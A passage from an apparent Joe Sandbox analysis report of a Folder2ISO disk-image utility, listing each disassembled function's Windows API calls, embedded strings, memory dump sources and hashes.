                  • RegCloseKey.ADVAPI32(?), ref: 006217D4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Close$CreateDeleteOpenValue$FileModuleNamelstrlen
                  • String ID: "%1"$Folder\shell\Folder2ISO$Folder\shell\Folder2ISO\command$Icon$Software\Classes$command
                  • API String ID: 3424706042-3616335184
                  • Opcode ID: 019a6a03b4d83ada43020338db1a297875737b456a6372c271addb5c078b6f1b
                  • Instruction ID: 18a182705871b81ad1bbec65ac81d3584ddd6940e18466cfa15e7ba5d3e0d4a8
                  • Opcode Fuzzy Hash: 019a6a03b4d83ada43020338db1a297875737b456a6372c271addb5c078b6f1b
                  • Instruction Fuzzy Hash: 5041F035244316BBE7209F61EC05FAB7BAEFF85B44F51082DF98196160E731A805CB62
                  Function 00621C65 Relevance: 33.1, APIs: 22, Instructions: 79COMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,00000003), ref: 00621C77
                  • EnableWindow.USER32(00000000), ref: 00621C80
                  • GetDlgItem.USER32(?,0000000D), ref: 00621C86
                  • EnableWindow.USER32(00000000), ref: 00621C89
                  • GetDlgItem.USER32(?,0000000A), ref: 00621C8F
                  • EnableWindow.USER32(00000000), ref: 00621C92
                  • GetDlgItem.USER32(?,00000004), ref: 00621C98
                  • EnableWindow.USER32(00000000), ref: 00621C9B
                  • GetDlgItem.USER32(?,0000000E), ref: 00621CA1
                  • EnableWindow.USER32(00000000), ref: 00621CA4
                  • GetDlgItem.USER32(?,0000000B), ref: 00621CAA
                  • EnableWindow.USER32(00000000), ref: 00621CAD
                  • GetDlgItem.USER32(?,00000005), ref: 00621CB3
                  • EnableWindow.USER32(00000000), ref: 00621CB6
                  • GetDlgItem.USER32(?,0000000F), ref: 00621CBC
                  • EnableWindow.USER32(00000000), ref: 00621CBF
                  • GetDlgItem.USER32(?,00000006), ref: 00621CC5
                  • EnableWindow.USER32(00000000), ref: 00621CC8
                  • GetDlgItem.USER32(?,00000010), ref: 00621CCE
                  • EnableWindow.USER32(00000000), ref: 00621CD1
                  • GetDlgItem.USER32(?,00000007), ref: 00621CD7
                  • EnableWindow.USER32(00000000), ref: 00621CDA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: EnableItemWindow
                  • String ID:
                  • API String ID: 3833022359-0
                  • Opcode ID: 7998ffd9c7c54e32890a9968648734bb79d6b564c457aec98d77e8186d4c1c34
                  • Instruction ID: 10a26954da15203ffdaa68d94abc7d12330706722adf03f19fb214b9a958675f
                  • Opcode Fuzzy Hash: 7998ffd9c7c54e32890a9968648734bb79d6b564c457aec98d77e8186d4c1c34
                  • Instruction Fuzzy Hash: A30102D5E4136C3DF97033B75C8DF6B6D0DCFC57E9F020812BA0AA618288A9AC008DB0
                  Function 00621474 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 153windowCOMMON
                  Download Yara Rule
                  APIs
                  • SetWindowTextW.USER32(?,Folder2ISO 1.2 (x86) 2024-06-19), ref: 00621488
                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00621491
                  • GetUserDefaultLangID.KERNEL32(?,LangId,00000000,?,?,?,?,?,?,00622900), ref: 006214AC
                  • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,00000000,TopMost,00000000,?,LangId,00000000), ref: 00621524
                  • LoadIconW.USER32(00000001,00000000), ref: 00621532
                  • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0062154A
                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00621551
                  • ImageList_LoadImageW.COMCTL32(00000001,00000010,00000003,000000FF,00000000,00002000,?,LangId,00000000,?,?,?,?,?,?,00622900), ref: 00621568
                  • GetDlgItem.USER32(?,00000010), ref: 00621576
                  • SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 00621590
                  • SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 0062159F
                  • SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 006215AE
                  • SendMessageW.USER32(00000000,00000143,00000000,00000000), ref: 006215BD
                  • SendMessageW.USER32(00000000,0000014E,00000003,00000000), ref: 006215E1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: MessageSend$ImageLoadWindow$AcceptDefaultDragFilesIconItemLangList_TextUser
                  • String ID: FileSystem$Folder2ISO 1.2 (x86) 2024-06-19$LangId$TopMost
                  • API String ID: 3138248541-2740339452
                  • Opcode ID: d2eb694c1907268927473d08619d458355a3e904c0ed73975658ecffa04a513c
                  • Instruction ID: c897b01b836a3da5aa027ff52daa0561cb044f51768d159d67cc2a76b2ee01f6
                  • Opcode Fuzzy Hash: d2eb694c1907268927473d08619d458355a3e904c0ed73975658ecffa04a513c
                  • Instruction Fuzzy Hash: D84148713847257EF3246B20BC96F7B369FEB43B54F20111DFA01AE1D0DAA59E808638
                  Function 00621F04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 153windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00621E9A: SetDlgItemTextW.USER32(00000000,00000012,?), ref: 00621ED6
                    • Part of subcall function 00621E9A: GetDlgItem.USER32(00000000,00000011), ref: 00621EDF
                    • Part of subcall function 00621E9A: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00621EEE
                  • GetFullPathNameW.KERNEL32(00000000,00000104,?,?,00000000,?,00000000,?), ref: 00621F56
                  • SetDlgItemTextW.USER32(00000000,0000000D,?), ref: 00621FA4
                  • SetDlgItemTextW.USER32(00000000,0000000E,?), ref: 00621FAE
                  • SetDlgItemTextW.USER32(00000000,0000000F,?), ref: 00621FB8
                  • _memset.LIBCMT ref: 00621FF7
                  • SetDlgItemTextW.USER32(00000000,0000000F,?), ref: 00622014
                  • SetDlgItemTextW.USER32(00000000,0000000E,?), ref: 00622079
                  • GetDlgItem.USER32(00000000,00000007), ref: 0062208A
                  • EnableWindow.USER32(00000000), ref: 0062208D
                  • GetDlgItem.USER32(00000000,00000007), ref: 00622096
                  • SendMessageW.USER32(00000000,00000028,00000000,00000001), ref: 0062209E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$Text$MessageSend$EnableFullNamePathWindow_memset
                  • String ID: .iso
                  • API String ID: 695811232-4289765698
                  • Opcode ID: baf839a46df9ba6e931c95c4fdbd6e7d2e0e02b4e245c0422d146fc10cfa3688
                  • Instruction ID: fe0527d91d0201d0787ea0ce8bef936e61672a7ed908a279aa91f99d93abd71d
                  • Opcode Fuzzy Hash: baf839a46df9ba6e931c95c4fdbd6e7d2e0e02b4e245c0422d146fc10cfa3688
                  • Instruction Fuzzy Hash: 25412A71604716BBD730DB64AC85FEBB7DEFFA4700F400429FA4597181EA70A945CA92
                  Function 00622C57 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 120windowCOMMON
                  Download Yara Rule
                  APIs
                  • _memset.LIBCMT ref: 00622C85
                  • GetDlgItem.USER32(?,00000035), ref: 00622C90
                  • LoadImageW.USER32(00000001,00000001,00000000,00000000,00000040), ref: 00622CA6
                  • SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 00622CB4
                  • SetDlgItemTextW.USER32(?,00000032,Folder2ISO 1.2 (x86) 2024-06-19), ref: 00622CC8
                  • SetDlgItemTextW.USER32(?,00000034,<a>https://www.yubsoft.com</a>), ref: 00622CD2
                  • SetDlgItemTextW.USER32(?,00000033,?), ref: 00622CF4
                  • SetDlgItemTextW.USER32(?,00000003,?), ref: 00622D34
                  • SetWindowTextW.USER32(?,?), ref: 00622D83
                  Strings
                  • <a>https://www.yubsoft.com</a>, xrefs: 00622CCA
                  • Translator: null, xrefs: 00622D16
                  • Folder2ISO 1.2 (x86) 2024-06-19, xrefs: 00622CC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: ItemText$ImageLoadMessageSendWindow_memset
                  • String ID: <a>https://www.yubsoft.com</a>$Folder2ISO 1.2 (x86) 2024-06-19$Translator: null
                  • API String ID: 373444793-2269206193
                  • Opcode ID: 6f4e0d6c2431f8411cc3af455ff3b958bc8a029d8bfcea363776cd1ad7362c57
                  • Instruction ID: 73a37f19acf6d09516be8f71eac8eacb44f18370b04841ae91cf35b60450ffb2
                  • Opcode Fuzzy Hash: 6f4e0d6c2431f8411cc3af455ff3b958bc8a029d8bfcea363776cd1ad7362c57
                  • Instruction Fuzzy Hash: C7312935244716ABC725DF64EC55BBB37BAFF86750F00082EF2018B2A0E7B99549CB52
                  Function 006221F0 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90stringwindowCOMMON
                  Download Yara Rule
                  APIs
                  • _memset.LIBCMT ref: 00622223
                  • lstrcpyW.KERNEL32(?,00622396), ref: 0062223C
                  • GetSaveFileNameW.COMDLG32(?), ref: 00622274
                  • lstrcatW.KERNEL32(-00000002,.iso), ref: 006222A9
                  • SetDlgItemTextW.USER32(?,0000000E,?), ref: 006222B7
                  • GetDlgItem.USER32(?,00000007), ref: 006222C8
                  • EnableWindow.USER32(00000000), ref: 006222CB
                  • GetDlgItem.USER32(?,00000007), ref: 006222D4
                  • SendMessageW.USER32(?,00000028,00000000,00000001), ref: 006222DC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$EnableFileMessageNameSaveSendTextWindow_memsetlstrcatlstrcpy
                  • String ID: .iso$X
                  • API String ID: 1111325823-3055512534
                  • Opcode ID: 063948163f887e793d06deda0f5ce089421e0c541bbd26bcf01566e6e9177b3f
                  • Instruction ID: da33f0006adfb9c4d856e2695c55ba3e1b14f729a70dc9c80db941505c366cf8
                  • Opcode Fuzzy Hash: 063948163f887e793d06deda0f5ce089421e0c541bbd26bcf01566e6e9177b3f
                  • Instruction Fuzzy Hash: 5E313336548711ABD320DF60EC8AB9B7BE9EF85B10F00092EF64496290DBB5D644CB92
                  Function 006212B7 Relevance: 16.6, APIs: 11, Instructions: 83windowCOMMON
                  Download Yara Rule
                  APIs
                  • SetDlgItemTextW.USER32(?,00000003,00000000), ref: 006212CE
                  • SetDlgItemTextW.USER32(?,00000004,00000000), ref: 006212DC
                  • SetDlgItemTextW.USER32(?,00000005,00000000), ref: 006212EA
                  • SetDlgItemTextW.USER32(?,00000006,00000000), ref: 006212F8
                  • SetDlgItemTextW.USER32(?,00000007,00000000), ref: 00621306
                  • GetDlgItem.USER32(?,0000000D), ref: 00621311
                  • GetDlgItem.USER32(?,0000000E), ref: 00621318
                  • GetDlgItem.USER32(?,0000000F), ref: 0062131F
                  • SendMessageW.USER32(00000000,00001501,00000000,00000000), ref: 0062133A
                  • SendMessageW.USER32(00000000,00001501,00000000,00000000), ref: 0062134E
                  • SendMessageW.USER32(00000000,00001501,00000000,00000000), ref: 0062135D
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$Text$MessageSend
                  • String ID:
                  • API String ID: 3384191816-0
                  • Opcode ID: c59542779b0c1d967863a575d7ff205165dc8f72a66be293dd73edda2569e889
                  • Instruction ID: 5e31f079f89e4b1ac4c93724dfbe0b0d30f48954c61abdc8b6a52a605e9584d9
                  • Opcode Fuzzy Hash: c59542779b0c1d967863a575d7ff205165dc8f72a66be293dd73edda2569e889
                  • Instruction Fuzzy Hash: C91112A2B8572879F57432756C5BF3B2F0ECB42B61F24441BBB09EE0C2DCD9A94049A4
                  Function 0062267F Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86timewindowCOMMON
                  Download Yara Rule
                  APIs
                  • MulDiv.KERNEL32(?,00000064,?), ref: 006226AF
                    • Part of subcall function 00621E9A: SetDlgItemTextW.USER32(00000000,00000012,?), ref: 00621ED6
                    • Part of subcall function 00621E9A: GetDlgItem.USER32(00000000,00000011), ref: 00621EDF
                    • Part of subcall function 00621E9A: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00621EEE
                  • KillTimer.USER32(?,0000000F), ref: 006226D0
                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00622701
                  • CloseHandle.KERNEL32(?,?,CloseWhenDone,00000000), ref: 0062270A
                  • wsprintfW.USER32 ref: 00622735
                  • GetDlgItemTextW.USER32(?,0000000E,?,00000104), ref: 0062274D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Item$MessageText$CloseHandleKillPostSendTimerwsprintf
                  • String ID: CloseWhenDone$RevealWhenDone$explorer.exe /select,
                  • API String ID: 367197272-3110793137
                  • Opcode ID: ba0c242ab8dd3657a003f0658a0d650348cfa1e223ba84918527e97b94b755f4
                  • Instruction ID: d8776b04260cc99411a9fe7a786571ad1c908b545412cdce6b192afe3b931b67
                  • Opcode Fuzzy Hash: ba0c242ab8dd3657a003f0658a0d650348cfa1e223ba84918527e97b94b755f4
                  • Instruction Fuzzy Hash: AA216771344B26BFE710AB60ACA5EBBB3AFEF49700F100129F90086190EF75DE40CA64
                  Function 00622ADE Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69stringsynchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00622B01
                  • lstrcpyW.KERNEL32(C:\Users\user\Desktop\6RVmzn1DzL.ini,?), ref: 00622B60
                  • CreateMutexW.KERNEL32(00000000,00000001,Folder2ISO,?,AllowMultipleInstances,00000001), ref: 00622B7F
                  • GetLastError.KERNEL32(?,AllowMultipleInstances,00000001), ref: 00622B85
                  • EnumWindows.USER32(00622A7A,00000000), ref: 00622B98
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CreateEnumErrorFileLastModuleMutexNameWindowslstrcpy
                  • String ID: .ini$AllowMultipleInstances$C:\Users\user\Desktop\6RVmzn1DzL.ini$Folder2ISO
                  • API String ID: 365442408-1378453226
                  • Opcode ID: 0da45711a1c10a1ca5b7b32e7ac10fa7d456301b675dbcbaf2626571e38d74b2
                  • Instruction ID: 50f9926ab829b8fed6e147e88f81311acc947c4e779cfdc3576e16bc16e46e4e
                  • Opcode Fuzzy Hash: 0da45711a1c10a1ca5b7b32e7ac10fa7d456301b675dbcbaf2626571e38d74b2
                  • Instruction Fuzzy Hash: CB11AA38500317BBCB249F64EC69BEA73B7FF01B05F604198F50196141DB701A00CF51
                  Function 0062A965 Relevance: 15.2, APIs: 10, Instructions: 215COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: _strncmp
                  • String ID:
                  • API String ID: 909875538-0
                  • Opcode ID: 5c89f4ffcb1624bbb2bea31782db3cdd5c196d095dfc6aa1e7d2bc12ba780d7b
                  • Instruction ID: 142aba9925b7818d6933511e0dd7af4ec3ecde5d498a7f14dffe4121f5429fde
                  • Opcode Fuzzy Hash: 5c89f4ffcb1624bbb2bea31782db3cdd5c196d095dfc6aa1e7d2bc12ba780d7b
                  • Instruction Fuzzy Hash: 36516AB2D0861273DA11BAB67D02F9B3B5F9B65314F04043AFA85D6303F5A1C55989A3
                  Function 0063FDDC Relevance: 15.2, APIs: 10, Instructions: 156memoryfileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __lseeki64_nolock.LIBCMT ref: 0063FDF7
                  • __lseeki64_nolock.LIBCMT ref: 0063FE17
                    • Part of subcall function 0063CB83: SetFilePointerEx.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000000,0063A05D,?,00000000,00000000,00000002,?), ref: 0063CBBA
                    • Part of subcall function 0063CB83: GetLastError.KERNEL32 ref: 0063CBC4
                    • Part of subcall function 0063CB83: __dosmaperr.LIBCMT ref: 0063CBCB
                  • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FE4B
                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FE52
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FEF7
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FEFE
                  • __lseeki64_nolock.LIBCMT ref: 0063FF1B
                  • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FF36
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 0063FF63
                  • __lseeki64_nolock.LIBCMT ref: 0063FF81
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: Heap__lseeki64_nolock$ErrorFileLastProcess$AllocFreePointer__dosmaperr
                  • String ID:
                  • API String ID: 2469247693-0
                  • Opcode ID: 51da78d7c0be570e2c6e768190ac92820c140cc02b7ecedcad807b969f3b9067
                  • Instruction ID: 73de903f75bd908a4f9de14ae9b9ea8403383110056c699aa1bb7a640459a094
                  • Opcode Fuzzy Hash: 51da78d7c0be570e2c6e768190ac92820c140cc02b7ecedcad807b969f3b9067
                  • Instruction Fuzzy Hash: 18415A32D047006BD7242B788C06B5E76D7AF85330F250B2CFA2AA72F3EB75884446E5
                  Function 00639091 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 284COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • ___DestructExceptionObject.LIBCMT ref: 00639357
                    • Part of subcall function 00639472: _CallSETranslator.LIBCMT ref: 006394D7
                  • ___DestructExceptionObject.LIBCMT ref: 00639419
                  • _UnwindNestedFrames.LIBCMT ref: 00639451
                  • CallUnexpected.LIBCMT ref: 0063946C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: CallDestructExceptionObject$FramesNestedTranslatorUnexpectedUnwind
                  • String ID: csm$csm$csm
                  • API String ID: 610588288-393685449
                  • Opcode ID: 80fbd82e3115b8ce352ae2c3e3a55d6537ed99b09793dd95b1348b5447887006
                  • Instruction ID: 13c4ae779a204eddf3e0530114fb4b488887bf2985dea6f725867f61811d49b1
                  • Opcode Fuzzy Hash: 80fbd82e3115b8ce352ae2c3e3a55d6537ed99b09793dd95b1348b5447887006
                  • Instruction Fuzzy Hash: CBB1CB31408701EFDB20AF68C8819AAB7E6BF84310F04492EF59557362D7B1EA45CFE6
                  Function 0063124B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 276COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: __allrem$__getptd_noexit
                  • String ID: s+b
                  • API String ID: 1539570564-2084237830
                  • Opcode ID: 45aff56497f511f1be1a66ec2dd43566976ebaa56bfeb1c67644a6f9c6d8fb94
                  • Instruction ID: f1f6d9e8c57964a85bc794f3c1a675065b6ec115c257458dc2da426e1f7fdfb2
                  • Opcode Fuzzy Hash: 45aff56497f511f1be1a66ec2dd43566976ebaa56bfeb1c67644a6f9c6d8fb94
                  • Instruction Fuzzy Hash: 4381D371A083019FE714EE68CC81BABB7EAEF85720F144A2DF555CB381E771D90486D5
                  Function 006340A8 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 146fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00650B42,00000104,00000001,00000000), ref: 00634141
                  • GetStdHandle.KERNEL32(000000F4,00000000,00000001,00000000), ref: 006341FB
                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0063424A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2397444397.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2397382238.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397474258.0000000000642000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397655410.000000000064E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2397680478.0000000000653000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_6RVmzn1DzL.jbxd
                  Similarity
                  • API ID: File$HandleModuleNameWrite
                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                  • API String ID: 3784150691-4022980321
                  • Opcode ID: 6afe203382a6bd98aedfd3d9edf3eb557354c75be5239a8ad5c0b785067fe947
                  • Instruction ID: 01d29f2be261fa7085caad95f8e5403e33764c323e2e3b843b17428878d58b25
                  • Opcode Fuzzy Hash: 6afe203382a6bd98aedfd3d9edf3eb557354c75be5239a8ad5c0b785067fe947
                  • Instruction Fuzzy Hash: 2541CB7560430226E7246B299C96FBBF79F9F91704F14052CFE85A2782EF22FB0585E1
                  Function 006227E6 Relevance: 12.2, APIs: 8, Instructions: 156COMMON
                  Download Yara Rule
                  APIs
                  • GetWindowLongW.USER32(?,000000EB), ref: 00622850
                    • Part of subcall function 006220BD: IsIconic.USER32(?), ref: 006220D7
                    • Part of subcall function 006220BD: ShowWindow.USER32(?,00000009), ref: 006220E4
                    • Part of subcall function 006220BD: DragQueryFileW.SHELL32(?,00000000,?,0000012C), ref: 006220F9
                    • Part of subcall function 006220BD: DragFinish.SHELL32(?), ref: 0062212F
                  • ImageList_Draw.COMCTL32(00000000,?,00000000,00000000,00000001), ref: 006229CC
                  • SetWindowLongW.USER32(?,00000000,00000001), ref: 006229D8
                  Memory Dump Source
